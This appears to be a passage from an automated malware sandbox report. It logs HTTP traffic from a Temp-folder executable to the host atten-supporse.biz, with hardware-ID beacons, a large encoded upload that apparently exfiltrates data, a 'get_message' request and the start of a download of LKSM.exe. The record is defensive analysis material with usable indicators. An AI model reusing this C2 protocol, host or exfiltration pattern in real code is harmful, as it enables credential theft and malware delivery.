                                                                                                                                          Data Ascii: --PHSWT3AU2H4FCXW15YWContent-Disposition: form-data; name="hwid"F663419F2A517DE6D599DAF6C95D6029--PHSWT3AU2H4FCXW15YWContent-Disposition: form-data; name="pid"3--PHSWT3AU2H4FCXW15YWContent-Disposition: form-data; name="lid"H8NgCl--Ch
                                                                                                                                          2024-12-08 17:06:26 UTC5113OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2
                                                                                                                                          Data Ascii: `M?lrQMn 64F6(X&7~
                                                                                                                                          2024-12-08 17:06:27 UTC1021INHTTP/1.1 200 OK
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:27 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=2gs6ri0l1areh5sfkmnim8gktm; expires=Thu, 03-Apr-2025 10:53:05 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bRx%2Bl4dmFnBArRBP0N6G1nCH1wJhalNe4saXDVMXB%2BI3o1X9UajoA2Ojg05tg%2B2bZq5Sg3AE2wQFCogu8N%2BYvsliSu5ey6ZZHCxycxsjJEvL8NiZOu4vKeIIPyo8X7CcT30yCpI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8eee58942df142cb-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2518&min_rtt=2512&rtt_var=955&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21409&delivery_rate=1137514&cwnd=162&unsent_bytes=0&cid=fe74e16cfa30223c&ts=891&x=0"
                                                                                                                                          2024-12-08 17:06:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                          Data Ascii: fok 8.46.123.228
                                                                                                                                          2024-12-08 17:06:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.449819172.67.165.1664437872C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-08 17:06:29 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=50E65A1ZC8B
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 1216
                                                                                                                                          Host: atten-supporse.biz
                                                                                                                                          2024-12-08 17:06:29 UTC1216OUTData Raw: 2d 2d 35 30 45 36 35 41 31 5a 43 38 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 36 33 34 31 39 46 32 41 35 31 37 44 45 36 44 35 39 39 44 41 46 36 43 39 35 44 36 30 32 39 0d 0a 2d 2d 35 30 45 36 35 41 31 5a 43 38 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 30 45 36 35 41 31 5a 43 38 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 43 68 75 76 61 6b 0d 0a 2d 2d 35 30 45 36 35 41 31 5a 43 38 42 0d 0a 43 6f 6e
                                                                                                                                          Data Ascii: --50E65A1ZC8BContent-Disposition: form-data; name="hwid"F663419F2A517DE6D599DAF6C95D6029--50E65A1ZC8BContent-Disposition: form-data; name="pid"1--50E65A1ZC8BContent-Disposition: form-data; name="lid"H8NgCl--Chuvak--50E65A1ZC8BCon
                                                                                                                                          2024-12-08 17:06:29 UTC1022INHTTP/1.1 200 OK
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:29 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=ps3mud6ho5hj60j4k274b5sqm8; expires=Thu, 03-Apr-2025 10:53:08 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lg19Ks2hKTGsey7rJK5xChtJW95VzIfaakjf%2BpWs4qUm4v5t9PeJGn1TjHeefNYboFHh6ZWPn%2FujREumakiNorja2CcXahEioKAnlNIGn5He%2FEMr%2B%2B1mjbcizmljmBDj%2FNtshIM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8eee58a51d898c39-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1783&rtt_var=679&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2128&delivery_rate=1599123&cwnd=190&unsent_bytes=0&cid=ca0bb1c1aa5e6adb&ts=755&x=0"
                                                                                                                                          2024-12-08 17:06:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                          Data Ascii: fok 8.46.123.228
                                                                                                                                          2024-12-08 17:06:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.449826172.67.165.1664437872C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-08 17:06:31 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=SCC5EPGZEJX
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 570532
                                                                                                                                          Host: atten-supporse.biz
                                                                                                                                          2024-12-08 17:06:31 UTC15331OUTData Raw: 2d 2d 53 43 43 35 45 50 47 5a 45 4a 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 36 33 34 31 39 46 32 41 35 31 37 44 45 36 44 35 39 39 44 41 46 36 43 39 35 44 36 30 32 39 0d 0a 2d 2d 53 43 43 35 45 50 47 5a 45 4a 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 43 43 35 45 50 47 5a 45 4a 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 43 68 75 76 61 6b 0d 0a 2d 2d 53 43 43 35 45 50 47 5a 45 4a 58 0d 0a 43 6f 6e
                                                                                                                                          Data Ascii: --SCC5EPGZEJXContent-Disposition: form-data; name="hwid"F663419F2A517DE6D599DAF6C95D6029--SCC5EPGZEJXContent-Disposition: form-data; name="pid"1--SCC5EPGZEJXContent-Disposition: form-data; name="lid"H8NgCl--Chuvak--SCC5EPGZEJXCon
                                                                                                                                          2024-12-08 17:06:31 UTC15331OUTData Raw: 38 25 20 e5 cd 7f ff a9 45 c8 07 f0 bb 2a 56 98 4a ac 94 66 2c 01 24 3d 09 0b a6 3c 0e 7b 05 d8 66 0a e0 77 e1 b5 be c3 38 24 a3 b7 15 5e 63 0c 9d 97 a4 e1 77 93 5d 44 c0 19 75 2c 8c e3 62 d7 ac d1 a1 8a db 57 f7 73 dd b6 83 d4 20 c7 ff b7 4a 49 f3 01 ba fd ae e0 0e 1a d4 93 c9 3d 41 c0 6b 0b 07 0b d0 14 9c d3 c2 c2 4b cc d8 3d 69 a5 02 10 ef cf 05 a3 d4 63 0c de 82 a1 6d 9b 25 c4 38 24 d5 2b 0c 2e 25 a6 39 b8 e1 40 83 3c 2f c0 18 1d b3 3d c3 a1 04 92 53 81 a9 db f9 45 9a 34 bf cd cf c9 61 0f bf 18 31 45 3b a5 bc 1c b9 50 f4 88 71 fc ab c5 29 15 de b4 56 1c b5 c2 54 56 63 08 96 e9 29 42 6c 00 ef 47 51 31 a6 e0 02 86 45 49 d9 6a f0 77 91 e7 d4 3a 12 b9 a4 15 f9 2a fe 31 e3 f1 55 3b 09 2a 99 91 8e 85 25 96 35 67 de 2d 01 bf 3d 34 6d 74 a0 20 f8 d1 8f 66 6f
                                                                                                                                          Data Ascii: 8% E*VJf,$=<{fw8$^cw]Du,bWs JI=AkK=icm%8$+.%9@</=SE4a1E;Pq)VTVc)BlGQ1EIjw:*1U;*%5g-=4mt fo
                                                                                                                                          2024-12-08 17:06:31 UTC15331OUTData Raw: 2a 12 5e 2c 8c 68 56 d3 89 28 aa 44 48 de b2 32 92 c6 3e 8e b4 31 73 7a 35 9d d1 fe 6b 0d 9a 43 58 de 28 28 85 7d 51 6f 95 db 24 e0 c8 4d 85 b1 fc 89 88 16 8a 44 b0 97 04 ed d4 03 5c c7 0b 04 15 29 33 0c f6 4a 45 96 98 ae 65 3e 1a 36 15 a3 55 c6 a7 9f 55 ae 4b 86 08 10 f7 74 bf cb 6f a2 9b 4c c1 42 31 5a aa 0f f1 72 85 2f 34 66 3f 14 8a 8c ed 9e 34 04 3e 48 f4 9b 3a a5 08 c4 04 95 5c 53 8a d1 41 f7 0c 86 0b cd 7e 31 9a 1e ec 58 a7 97 58 ec ef 3c cf 94 44 87 0b f2 f6 d5 d3 ff 52 75 fd 1e 47 61 18 94 71 e6 e6 8c fc 56 df 1c b3 e4 0c 48 23 fc ce 57 e4 e6 ba 19 44 b8 d6 8e 50 ad ef 0f 90 f7 74 5d 8f a0 5c 39 c3 75 79 83 87 46 5f cd 4f 7d 17 bb 5c f9 57 d0 cf 16 8d cd 78 6f 17 c8 47 13 ce 3c 41 c6 dc c1 dc 7d b0 78 29 26 2b 4f ed 4e 3c 9b d4 7a 90 7c 81 d1 b0
                                                                                                                                          Data Ascii: *^,hV(DH2>1sz5kCX((}Qo$MD\)3JEe>6UUKtoLB1Zr/4f?4>H:\SA~1XX<DRuGaqVH#WDPt]\9uyF_O}\WxoG<A}x)&+ON<z|
                                                                                                                                          2024-12-08 17:06:31 UTC15331OUTData Raw: 5e dd 5b 34 51 75 68 a4 b8 41 fb e4 20 42 dc dd 3b 40 f5 85 2e a7 df 5b 86 14 7d f5 db 93 12 db a5 af f6 d4 8b 4b cf ae 86 01 db 18 d4 1c db ac 35 af 04 60 a8 bf ef 7e 3c f2 8a e9 d2 17 9c 81 3a d0 32 df bc ef d1 3a e1 6a b8 52 6a 8a b7 75 30 ca 7f 77 6d ea 2f 82 6e 8a a0 f8 8b d8 01 5f 70 c6 e6 bf a2 c9 d1 eb 1d 75 46 39 4b 13 cd 56 db 4b 45 1f 9d 78 c9 d1 f2 bb 4b 6a 3e 71 cd 76 ce 87 5f 2f bc f7 df cb 90 1d 16 bc 43 71 fb 80 ee 45 7e 7e c8 91 7e 40 f8 af 96 92 ba b9 c9 b9 48 75 0d 5d b2 fb 78 a3 37 6a 49 e4 26 da e3 9e 6b 92 50 52 83 9e a0 99 0b 18 6b 53 63 2a 75 7b 0b 82 6b 4b b0 f3 28 75 f3 b8 0c 9d 30 b8 e5 77 e7 e4 e7 6e 1c b3 a7 fd 68 49 da c2 23 ca de ee f6 8f 73 a9 95 3f 38 06 71 16 14 d9 ab cd 77 79 8a 17 cf d1 fc ca 5a fb c9 9f 76 cf f0 f4 5b
                                                                                                                                          Data Ascii: ^[4QuhA B;@.[}K5`~<:2:jRju0wm/n_puF9KVKExKj>qv_/CqE~~~@Hu]x7jI&kPRkSc*u{kK(u0wnhI#s?8qwyZv[
                                                                                                                                          2024-12-08 17:06:31 UTC15331OUTData Raw: b7 94 19 d2 0f 89 d3 8b 99 bc 09 9b ea fb 73 71 70 f3 a0 8e 70 97 af d6 69 8e 8f 94 d1 78 9b 83 57 39 39 67 c1 6b 68 e4 85 ea 52 6d 72 55 59 12 3a f6 80 ea 88 05 c7 26 78 bf b3 8b bc d8 ee 9d 3d ad 4c b7 87 dc 66 cd ca bc 27 7f 8f 95 64 c0 ab 02 37 ab 33 5c 73 21 de 32 a2 17 61 30 c7 05 7f 98 31 b8 b9 17 21 04 8c 26 72 a1 3a 22 d0 7b 7d 86 8f 38 38 ae 66 b3 03 79 1e 4a 6f 88 fa 5f 99 b4 45 06 05 dc f6 9a 74 2a ba 8f 04 1f ee 65 36 f1 80 21 8a e3 a8 b5 aa 0b 46 78 e7 dd fb 4f 87 df 6b 9b fa 6b 49 3a dc 3f 22 69 73 4f e5 bd b2 39 29 dd 0f fd f7 01 ad 69 e1 64 c2 0a c4 f0 4f a4 f2 fd ff 5f c9 0d 49 50 3a c6 03 e7 81 c5 3f 03 97 64 16 df 08 31 aa ca 29 29 2d c8 62 f8 f3 62 c9 a3 22 1e 0e c2 79 aa fd 13 67 47 38 e1 bb 44 59 56 82 20 e2 cf f6 74 a0 a2 fd 0c 49
                                                                                                                                          Data Ascii: sqppixW99gkhRmrUY:&x=Lf'd73\s!2a01!&r:"{}88fyJo_Et*e6!FxOkkI:?"isO9)idO_IP:?d1))-bb"ygG8DYV tI
                                                                                                                                          2024-12-08 17:06:31 UTC15331OUTData Raw: 14 a0 7b 7b 78 4d 7b c9 f6 56 62 85 70 83 20 a5 c9 8d ef e5 c4 d9 ce c9 a5 b5 21 1b b7 8a f9 75 66 11 72 4e 75 12 c2 4d e5 c8 0a 8b c6 cf cb 35 d8 6a f9 42 17 7b 42 81 dc b3 a8 42 52 a3 81 81 af c0 8f 83 2d 81 54 75 e5 56 6f ed da 04 28 de 7b db e7 59 9a 16 32 b0 60 fb d5 8e 5a 11 6b 19 46 00 62 57 ad 33 4a 39 5c 9f 63 db c5 31 a5 5f 08 03 82 6e 8c dd e3 eb b9 7f e4 ee d6 a4 53 bd 62 77 91 b3 47 5b b2 50 89 4a b4 a1 98 fd 78 df e5 8f 46 36 df f4 3d 0b 04 0d 35 9a c2 b6 f8 c2 4e b7 f1 15 e7 1b ce 3a c6 f6 56 6c 3f f8 11 64 f8 43 e8 9c b3 ec af ba c4 67 d0 ef 12 6c 6e 65 22 86 00 1e 0c 15 d0 5b db 06 e5 6d b9 3f 5c 21 e1 6c 44 ef 20 6e fd 16 bd e0 a8 ce e1 2d 7d dc 21 8e 3f 6a 62 eb 28 bd c8 cc 80 64 58 25 c9 88 de a7 a6 3e ab 27 8f 09 81 7d 7e 54 87 f4 4f
                                                                                                                                          Data Ascii: {{xM{Vbp !ufrNuM5jB{BBR-TuVo({Y2`ZkFbW3J9\c1_nSbwG[PJxF6=5N:Vl?dCglne"[m?\!lD n-}!?jb(dX%>'}~TO
                                                                                                                                          2024-12-08 17:06:31 UTC15331OUTData Raw: ff 58 33 c1 e5 5c 20 43 c4 62 36 12 79 08 23 cb db 2c 6b 17 32 bd fe b3 9c 22 27 4a de d5 f5 9c 55 f2 ff b5 55 fc c4 c9 22 e0 eb 9d c3 79 71 55 1e 6f f6 b5 05 c6 e9 f6 7d 43 e2 dd b9 6f 55 59 c3 12 4d b0 0b a7 4a 90 91 82 20 0f 1d 58 5d 9a 91 94 c6 09 42 6e a0 ce 6d a6 20 75 37 1b 36 51 ee 70 ab ea a1 e8 8f 8b 80 b0 ea 1d 04 6e e1 64 66 33 27 38 50 25 ff db b2 57 36 3e 7a c9 80 6b 77 96 87 64 bd 4c fd eb 5f 1f 3f 42 fe d8 19 9f 0d 24 88 f7 de c0 2d e2 90 e5 b7 1c d3 dc e7 4a e2 ab f1 8a 56 b4 24 c6 fa cf 4c 7c e4 93 cd d0 14 44 f2 6d 16 66 73 dc 96 34 94 50 a0 8d 84 9b 0f 58 91 26 e8 ac dc 59 2d fd 36 1f cd fa 19 25 7a 13 0d 70 9b ab 3f d3 58 3e 43 08 fa b5 d1 a5 c7 39 f7 02 99 ec 00 e7 ea 1f d7 a2 1c 7a c1 62 8d 10 b8 ba 31 5a f2 b1 46 7a b4 52 a9 6f b3
                                                                                                                                          Data Ascii: X3\ Cb6y#,k2"'JUU"yqUo}CoUYMJ X]Bnm u76Qpndf3'8P%W6>zkwdL_?B$-JV$L|Dmfs4PX&Y-6%zp?X>C9zb1ZFzRo
                                                                                                                                          2024-12-08 17:06:31 UTC15331OUTData Raw: 90 52 0f 2b f1 03 6b 23 66 dd 1d 24 41 f7 1d ea 4f 22 21 44 0e 31 ef 44 3d 10 30 07 af 1b ce 5f 0b 85 09 cf 43 f4 f9 13 17 87 2a 1c 46 f3 d2 09 22 9a 0c 85 74 c5 d7 e4 04 4f 53 d8 b4 1e 2e 93 ea a2 72 df 4d db 5c 0c c3 c0 04 b2 33 df af f6 ff b6 a7 b5 e8 65 fe 48 d8 04 3c 07 e6 9e a3 60 d9 f9 33 e3 2f b0 30 1f 8e 77 51 1a db 39 3e 31 e7 ca b6 1f 88 34 20 6a a3 cc c4 fa 8a 6e d8 d7 ba 28 a5 cf 8d a7 98 5d 50 bc a4 94 61 30 a7 de e6 1a 6b 5f 43 94 0f d5 bb 24 18 4f e6 07 bc 02 eb b1 55 47 5d eb 3b cd 9a c6 f7 87 38 4a 05 20 31 ab 7c 45 bd f4 07 9e fe 24 ec f5 7d 8b de 50 32 b2 3b 35 ae a5 86 f7 44 34 d0 6c 3e 0d 7e 2b 5f d5 2f f1 e4 bc 28 7b 70 7c 58 a2 df 69 d3 f9 5f c4 13 4a e1 fe a9 fa ab 02 a4 40 8f 18 c6 b0 51 7e 4f 49 c0 35 af a5 cd 2f 89 78 52 ad a9
                                                                                                                                          Data Ascii: R+k#f$AO"!D1D=0_C*F"tOS.rM\3eH<`3/0wQ9>14 jn(]Pa0k_C$OUG];8J 1|E$}P2;5D4l>~+_/({p|Xi_J@Q~OI5/xR
                                                                                                                                          2024-12-08 17:06:31 UTC15331OUTData Raw: 97 30 dd d7 4f fa f6 44 15 6a 5e 24 ee ef 01 f4 c1 4c 84 96 04 31 f3 65 41 d5 e5 fd 00 fe 97 17 44 1b 4c ba 57 e6 ac bd 4c 6c 21 6b 63 b9 0e a8 ef 9a 3c 02 db cd 1c 66 a4 c0 d5 dd a6 f2 10 29 1e 0e 42 96 09 67 58 ba 8f 26 c3 af c9 bc 18 bb 20 89 25 4e f1 75 fc 4a f0 5b 10 6e 25 20 22 dd fc 3c e6 1f a8 70 e7 f6 54 a8 77 3a 74 2c 41 96 d9 b8 4e 13 c1 ef 92 85 df 01 94 db 50 52 ec d6 c1 e7 21 44 fc 0d c6 c5 64 db d9 ee a2 61 3d b6 8c b0 90 1b f7 e0 b5 d1 02 e1 28 95 4e c0 9d 98 0b 3f 4a 80 b5 0c 7f cd 31 39 af 74 da 1a a2 25 44 85 20 e5 8d 40 1d aa 30 41 84 4e d8 77 a9 fe 01 c4 0f f1 f1 0b 4a 7c ab 39 f0 28 56 fe e9 27 70 a0 f7 6b 53 3e ca ac 21 58 82 f3 06 a4 3f 09 56 45 d0 82 5d 63 1a 5f 3c 19 54 77 c8 6f 0f e0 9b 4d ca 23 f3 f3 cd 6e d1 a3 c2 04 85 99 da
                                                                                                                                          Data Ascii: 0ODj^$L1eADLWLl!kc<f)BgX& %NuJ[n% "<pTw:t,ANPR!Dda=(N?J19t%D @0ANwJ|9(V'pkS>!X?VE]c_<TwoM#n
                                                                                                                                          2024-12-08 17:06:31 UTC15331OUTData Raw: 61 6d 69 e5 3a ad f1 72 e6 ef 27 e7 42 db f7 05 70 8e 9a ad 78 21 36 00 fb 68 8b 74 ff 7f 80 32 fb 5c eb 51 a1 31 48 37 67 6c e8 ed 7f ba 7d 1c 36 be 0b ea 16 64 f3 cf 55 df 3f 7c 4b 82 b0 dd 28 80 db 0b 91 f9 a1 8c 3d d1 43 b1 f9 46 76 28 18 0e b3 dd bd cd d2 9f b3 6e fd 0c ae 0f e1 e5 4e 61 d9 05 d9 47 f7 4b 33 6f 35 a8 d9 9c 46 d6 36 c6 7d 7f e9 9b e3 a5 00 f6 e0 39 01 91 55 8b 31 52 27 9d 7c b9 1f 9a 5d 1d 64 69 45 13 16 fc 64 71 ce e3 af e6 b7 01 7e 02 f1 d7 08 31 08 17 8c db fa f5 ec d2 68 92 08 c5 17 32 77 cc cf 40 c8 3c ac 17 dd 21 d8 94 a5 75 08 1c b6 4e af ad 31 5a 0d 4c 6b 42 9b 96 62 f8 e9 8d 3c 14 73 93 62 ee 79 96 b5 9e f4 e9 7a 1a 2f 98 dc 40 cf d8 81 a6 5f c2 1a 0b 94 d7 49 b5 b2 e9 8a f5 81 b2 22 63 3a 6f 94 13 c3 bd a5 98 cd 2a f3 de ae
                                                                                                                                          Data Ascii: ami:r'Bpx!6ht2\Q1H7gl}6dU?|K(=CFv(nNaGK3o5F6}9U1R'|]diEdq~1h2w@<!uN1ZLkBb<sbyz/@_I"c:o*
                                                                                                                                          2024-12-08 17:06:33 UTC1025INHTTP/1.1 200 OK
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:33 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=tv28fhdfvnml30su6ul6gpa5lp; expires=Thu, 03-Apr-2025 10:53:12 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8wOojdaqKGETgyi%2Br6B3rtprG6H0KXY8iOXvctoV5BMdE7qBmu5kmQTK7GahigRXGWHidX6MpTI1n2axtp5Xwp28zlGpecEvt7Q6%2FRffRAmv%2FHn9cBmzCeixSnMMjN%2FWqfIpNAc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8eee58b40bbf0cb2-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1501&rtt_var=572&sent=324&recv=594&lost=0&retrans=0&sent_bytes=2847&recv_bytes=573074&delivery_rate=1896103&cwnd=152&unsent_bytes=0&cid=fc26c7124514187a&ts=2294&x=0"


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.449834172.67.165.1664437872C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-08 17:06:35 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 83
                                                                                                                                          Host: atten-supporse.biz
                                                                                                                                          2024-12-08 17:06:35 UTC83OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 43 68 75 76 61 6b 26 6a 3d 26 68 77 69 64 3d 46 36 36 33 34 31 39 46 32 41 35 31 37 44 45 36 44 35 39 39 44 41 46 36 43 39 35 44 36 30 32 39
                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=H8NgCl--Chuvak&j=&hwid=F663419F2A517DE6D599DAF6C95D6029
                                                                                                                                          2024-12-08 17:06:36 UTC1014INHTTP/1.1 200 OK
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:36 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=q7bm663eqrbotqv04acvcc5bl9; expires=Thu, 03-Apr-2025 10:53:14 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JmitHAZq%2BOR10YLFjIlgEp6jSJARmd7QE7cP3IAS9v0VVXxT9Zp9uxQvNfR7lsuPLNXZCdmBENA6BNA8oKrnZakgqWOOu1E65NzkhF%2Bu31ZvE6YSiQNbE5ru6NfIe169jbkL1d4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8eee58cb6d1d8c35-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1778&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=985&delivery_rate=1559829&cwnd=242&unsent_bytes=0&cid=4a13851ff27325f6&ts=1095&x=0"
                                                                                                                                          2024-12-08 17:06:36 UTC122INData Raw: 37 34 0d 0a 43 39 71 6c 36 73 55 68 73 6c 43 33 45 35 70 52 72 65 4e 4f 77 63 5a 66 76 37 78 7a 34 6a 5a 43 72 7a 67 35 50 7a 4a 54 64 6a 78 51 6f 59 65 66 35 78 75 51 4f 4d 4e 6e 36 69 4b 58 76 32 47 64 36 54 6a 65 30 52 61 51 51 69 33 41 56 42 64 61 52 77 39 5a 63 45 43 4a 36 4d 53 67 57 64 64 79 6d 7a 48 38 4a 59 2f 5a 66 75 33 6b 4f 70 32 47 51 35 39 72 0d 0a
                                                                                                                                          Data Ascii: 74C9ql6sUhslC3E5pRreNOwcZfv7xz4jZCrzg5PzJTdjxQoYef5xuQOMNn6iKXv2Gd6Tje0RaQQi3AVBdaRw9ZcECJ6MSgWddymzH8JY/Zfu3kOp2GQ59r
                                                                                                                                          2024-12-08 17:06:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.449845104.21.9.1684437872C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-08 17:06:37 UTC195OUTGET /LKSM.exe HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
